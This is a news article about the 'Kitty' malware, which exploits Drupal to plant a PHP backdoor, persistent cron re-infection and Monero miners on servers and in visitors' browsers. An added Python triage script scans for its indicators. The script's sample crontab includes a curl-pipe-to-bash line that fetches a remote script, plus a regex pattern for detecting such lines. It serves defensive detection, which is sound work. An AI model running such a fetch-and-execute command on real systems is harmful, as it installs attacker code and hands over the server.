Monero’s CryptoKitty: A Malware Delivery Server

Cryptovest

Published May 24, 2018 04:00PM ET

Updated May 24, 2018 04:30PM ET

Hackers’ fascination with Monero doesn’t appear to be slowing down. As servers barely begin to recover from the onslaught of exploits that mined Monero using their processors, another remote code execution vulnerability is attacking systems running Drupal.

The researchers at Help Net Security who discovered it gave it the moniker “Kitty” because the malware is delivered from a folder with this name. Don’t let the cute name fool you: this exploit injects code into the server that continues to work even if the administrator removes Drupal from it.

“Once the Kitty bash script is executed, a PHP file named kdrupal.php is written to the infected server disc. In doing so, the attacker reinforces their foothold in the infected server and guarantees dominance using a backdoor independent of the Drupal vulnerability,” the company wrote in its report.

The script first authenticates the attacker, making sure no one else can access its functions. Then, it registers a scheduled service that repeatedly downloads and executes a script to ensure that the server remains infected.

“Once the attacker gets a persistent hold of the server, a mining program ‘kkworker,’ which is the well-known XMRig Monero miner, is installed and starts the mining process,” the company added.

Kitty isn’t done yet, though.

It might have control of a powerful server to do its bidding, but Kitty is a greedy creature. The attack also involves a mining script, labeled “me0w.js,” which injects itself into every JavaScript file it can find on the server.

Inside the script, we can also see code that uses visitors’ CPUs to mine Monero to the hacker’s wallet.

Further in the code, we can also find a statement from the hacker that reads, “don’t delete pls i am a harmless cute little kitty.”
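The indicators the article lists (a dropped kdrupal.php, the kkworker miner binary, me0w.js injected into JavaScript files, and the “harmless cute little kitty” string) lend themselves to a simple host triage. The script below is an added example written for this page, not code from Cryptovest, Help Net Security or the Kitty authors. The file names and marker string come from the article; the cron heuristic (flagging entries that pipe a download straight into a shell) and the sample web root and crontab are constructed assumptions, so adjust them to the scheduler and paths of the host being checked.

```python
"""Host triage for the Kitty indicators described in the article.
Added example, not code from the article's publisher or researchers.
File names and the marker string are from the article; the cron
heuristic and all sample data below are constructed assumptions."""
import os
import re
import tempfile

# Indicators taken from the article text.
SUSPECT_FILENAMES = {"kdrupal.php", "kkworker", "me0w.js"}
KITTY_MARKER = "harmless cute little kitty"

# Assumption: persistence looks like a cron line that fetches a script
# over HTTP and pipes it into a shell ("repeatedly downloads and executes").
_CRON_FETCH_EXEC = re.compile(r"(curl|wget)\b.*\|\s*(ba)?sh\b")


def scan_crontab(text):
    """Return crontab lines that download-and-execute (assumed persistence style)."""
    hits = []
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#") and _CRON_FETCH_EXEC.search(line):
            hits.append(line)
    return hits


def scan_webroot(root):
    """Walk a web root and report suspect file names plus any JavaScript file
    carrying the injected miner marker. Returns {relative path: reason}."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            if name in SUSPECT_FILENAMES:
                findings[rel] = "suspect file name"
                continue
            if name.endswith(".js"):
                try:
                    with open(path, "r", encoding="utf-8", errors="ignore") as fh:
                        if KITTY_MARKER in fh.read():
                            findings[rel] = "injected miner marker in JavaScript"
                except OSError:
                    pass  # unreadable file: skip rather than abort the sweep
    return findings


def build_sample_webroot():
    """Constructed sample tree mimicking an infected Drupal install.
    Contents are placeholders, not the real backdoor or miner."""
    root = tempfile.mkdtemp(prefix="kitty_demo_")
    os.makedirs(os.path.join(root, "sites", "all", "libraries"))
    with open(os.path.join(root, "kdrupal.php"), "w") as fh:
        fh.write("<?php /* constructed placeholder */ ?>\n")
    with open(os.path.join(root, "sites", "all", "libraries", "app.js"), "w") as fh:
        fh.write("function ok(){}\n"
                 "/* don't delete pls i am a harmless cute little kitty */\n")
    with open(os.path.join(root, "clean.js"), "w") as fh:
        fh.write("console.log('clean');\n")
    return root


# Constructed sample crontab: one benign entry, one fetch-and-execute entry
# pointing at a documentation-only (TEST-NET) address.
SAMPLE_CRONTAB = """\
# constructed sample crontab
0 3 * * * /usr/bin/logrotate /etc/logrotate.conf
*/5 * * * * curl -s http://198.51.100.10/kitty.sh | bash
"""

if __name__ == "__main__":
    demo_root = build_sample_webroot()
    for rel, why in sorted(scan_webroot(demo_root).items()):
        print(f"{rel}: {why}")
    for entry in scan_crontab(SAMPLE_CRONTAB):
        print("cron persistence:", entry)
```

Point `scan_webroot` at the real document root and feed `scan_crontab` the output of `crontab -l` for the web server user (and root) to cover the persistence the article describes; a clean result from these two checks does not rule out other persistence, so treat them as a first pass, not a full forensic sweep.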

Help Net Security responded to this finding with, “Good thing we’re dog people.”

It bears mentioning that this particular exploit is a variant of the “Drupalgeddon 2.0” series of attacks, in which over 300 servers running Drupal—including sites like the San Diego Zoo and the government of Chihuahua, Mexico—were forced to mine Monero for a hacker.


This article appeared first on Cryptovest